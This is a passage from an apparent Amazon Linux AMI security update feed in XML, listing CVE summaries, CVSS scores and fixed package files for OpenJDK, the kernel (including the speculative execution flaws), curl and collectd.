Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502632:
CVE-2017-10347 OpenJDK: unbounded memory allocation in SimpleTimeZone deserialization (Serialization, 8181323)
CVE-2017-10346:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1501873:
CVE-2017-10346 OpenJDK: insufficient loader constraints checks for invokespecial (Hotspot, 8180711)
CVE-2017-10345:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
1502858:
CVE-2017-10345 OpenJDK: unbounded resource use in JceKeyStore deserialization (Serialization, 8181370)
CVE-2017-10295:
It was found that the HttpURLConnection and HttpsURLConnection classes in the Networking component of OpenJDK failed to check for newline characters embedded in URLs. An attacker able to make a Java application perform an HTTP request using an attacker provided URL could possibly inject additional headers into the request.
1502687:
CVE-2017-10295 OpenJDK: HTTP client insufficient check for newline in URLs (Networking, 8176751)
CVE-2017-10285:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1501868:
CVE-2017-10285 OpenJDK: incorrect privilege use when handling unreferenced objects (RMI, 8174966)
CVE-2017-10281:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502649:
CVE-2017-10281 OpenJDK: multiple unbounded memory allocations in deserialization (Serialization, 8174109)
CVE-2017-10274:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Smart Card IO). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE accessible data as well as unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N).
1502053:
CVE-2017-10274 OpenJDK: CardImpl incorrect state handling (Smart Card IO, 8169026)
CVE-2017-10198:
It was discovered that the Security component of OpenJDK could fail to properly enforce restrictions defined for processing of X.509 certificate chains. A remote attacker could possibly use this flaw to make Java accept certificate using one of the disabled algorithms.
1472320:
CVE-2017-10198 OpenJDK: incorrect enforcement of certificate path restrictions (Security, 8179998)
CVE-2017-10193:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1471715:
CVE-2017-10193 OpenJDK: incorrect key size constraint check (Security, 8179101)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10193" title="" id="CVE-2017-10193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10198" title="" id="CVE-2017-10198" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10274" title="" id="CVE-2017-10274" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10281" title="" id="CVE-2017-10281" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10285" title="" id="CVE-2017-10285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10295" title="" id="CVE-2017-10295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10345" title="" id="CVE-2017-10345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10346" title="" id="CVE-2017-10346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10347" title="" id="CVE-2017-10347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10348" title="" id="CVE-2017-10348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10349" title="" id="CVE-2017-10349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10350" title="" id="CVE-2017-10350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10355" title="" id="CVE-2017-10355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10356" title="" id="CVE-2017-10356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10357" title="" id="CVE-2017-10357" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10388" title="" id="CVE-2017-10388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.161-2.6.12.0.75.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-937</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-937: important priority package update for kernel</title><issued date="2017-12-21 00:02:00" /><updated date="2017-12-21 23:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-16994:
The walk_hugetlb_range() function in &#039;mm/pagewalk.c&#039; file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
1518155:
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
CVE-2017-16650:
The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.
1516265:
CVE-2017-16650 kernel: Divide-by-zero in drivers/net/usb/qmi_wwan.c
CVE-2017-16649:
The usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.
1516267:
CVE-2017-16649 kernel: Divide-by-zero in drivers/net/usb/cdc_ether.c
CVE-2017-16647:
drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.
1516270:
CVE-2017-16647 kernel: NULL pointer dereference in drivers/net/usb/asix_devices.c
CVE-2017-16646:
drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device.
1516272:
CVE-2017-16646 kernel: BUG in drivers/media/usb/dvb-usb/dib0700_devices.c
CVE-2017-16645:
The ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.
1516235:
CVE-2017-16645 kernel: Out-of-bounds read in drivers/input/misc/ims-pcu.c
CVE-2017-16643:
The parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.
1516232:
CVE-2017-16643 kernel: Out-of-bounds read in drivers/input/tablet/gtco.c
CVE-2017-15115:
A vulnerability was found in the Linux kernel when peeling off an association to the socket in another network namespace. All transports in this association are not to be rehashed and keep using the old key in hashtable, thus removing transports from hashtable when closing the socket, all transports are being freed. Later on a use-after-free issue could be caused when looking up an association and dereferencing the transports.
1513345:
CVE-2017-15115 kernel: use-after-free in sctp_cmp_addr_exact
CVE-2017-1000407:
Linux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest was to flood the I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel resulting in DoS.
1520328:
CVE-2017-1000407 Kernel: KVM: DoS via write flood to I/O port 0x80
CVE-2017-1000405:
A flaw was found in the patches used to fix the &#039;dirtycow&#039; vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.
1516514:
CVE-2017-1000405 kernel: pmd can become dirty without going through a COW cycle
CVE-2017-0861:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0861" title="" id="CVE-2017-0861" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405" title="" id="CVE-2017-1000405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000407" title="" id="CVE-2017-1000407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15115" title="" id="CVE-2017-15115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16643" title="" id="CVE-2017-16643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16645" title="" id="CVE-2017-16645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16646" title="" id="CVE-2017-16646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16647" title="" id="CVE-2017-16647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16649" title="" id="CVE-2017-16649" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16650" title="" id="CVE-2017-16650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16994" title="" id="CVE-2017-16994" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.70" release="22.55.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.70-22.55.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-938</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-938: medium priority package update for curl</title><issued date="2018-01-03 08:22:00" /><updated date="2018-01-03 22:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8817:
The FTP wildcard function in curl and libcurl before 7.57.0 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) or possibly have unspecified other impact via a string that ends with an &#039;[&#039; character.
1515760:
CVE-2017-8817 curl: FTP wildcard out of bounds read
CVE-2017-8816:
The NTLM authentication feature in curl and libcurl before 7.57.0 on 32-bit platforms allows attackers to cause a denial of service (integer overflow and resultant buffer overflow, and application crash) or possibly have unspecified other impact via vectors involving long user and password fields.
1515757:
CVE-2017-8816 curl: NTLM buffer overflow via integer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8816" title="" id="CVE-2017-8816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8817" title="" id="CVE-2017-8817" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.53.1" release="13.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-13.80.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.53.1" release="13.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-13.80.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="13.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-13.80.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="13.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-13.80.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="13.80.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-13.80.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="13.80.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-13.80.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="13.80.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-13.80.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="13.80.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-13.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-939</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-939: critical priority package update for kernel</title><issued date="2018-01-03 19:27:00" /><updated date="2018-01-16 01:10:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5754:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instruction permission faults, exception generation triggered by a faulting access is suppressed until the retirement of the whole instruction block. In a combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. Note: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64 microprocessors are not affected by this issue.
1519781:
CVE-2017-5754 hw: cpu: speculative execution permission faults handling
CVE-2017-5715:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks.
1519780:
CVE-2017-5715 hw: cpu: speculative execution branch target injection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715" title="" id="CVE-2017-5715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754" title="" id="CVE-2017-5754" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.76" release="3.78.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.76-3.78.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-940</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-940: medium priority package update for collectd</title><issued date="2018-01-04 19:38:00" /><updated date="2018-01-05 20:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-16820:
The csnmp_read_table function in snmp.c in the SNMP plugin in collectd before 5.6.3 is susceptible to a double free in a certain error case, which could lead to a crash (or potentially have other impact).
1516447:
CVE-2017-16820 collectd: double free in csnmp_read_table function in snmp.c
